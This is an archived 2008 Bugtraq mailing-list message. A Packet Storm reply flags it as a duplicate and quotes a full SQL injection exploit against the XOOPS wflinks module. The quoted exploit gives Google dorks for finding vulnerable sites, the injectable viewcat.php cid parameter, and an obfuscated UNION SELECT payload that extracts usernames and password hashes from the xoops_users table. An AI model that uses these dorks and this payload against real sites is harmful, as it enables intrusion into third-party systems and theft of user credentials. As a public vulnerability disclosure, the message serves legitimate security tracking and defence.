lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Tue, 19 Feb 2008 23:43:23 -0500 From: packet@...ketstormsecurity.org To: hackturkiye.hackturkiye@...il.com Cc: bugtraq@...urityfocus.com Subject: Re: XOOPS Module wflinks SQL Injection(cid) fyi - duplicate of http://packetstormsecurity.org/0704-exploits/xoopswflinks-sql.txt On Mon, Feb 18, 2008 at 05:19:20PM -0000, hackturkiye.hackturkiye@...il.com wrote: > ############################################################### > # > # XOOPS Module wflinks SQL Injection(cid) > # > ############################################################### > # > # AUTHOR : S@BUN > # > # HOME 1 : http://www.milw0rm.com/author/1334 > # > # MAİL : hackturkiye.hackturkiye@...il.com > # > ################################################################ > # > # DORK 1 : allinurl: modules/wflinks/viewcat.php > # > # DORK 2 : allinurl: modules/wflinks > # > ################################################################ > > example > > http://xxxxxx.com/modules/wflinks/viewcat.php?cid= [exploit] > > EXPLOIT : > > -888888%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/char(117,115,101,114,110,97,109,101,58),concat(uname,0x3a,pass)/**/from%2F%2A%2A%2Fxoops_users/*%20where%20admin%20pass%20 > > > ################################################################ > # S@BUN i AM NOT HACKER S@BUN > ################################################################ > > >
Powered by blists - more mailing lists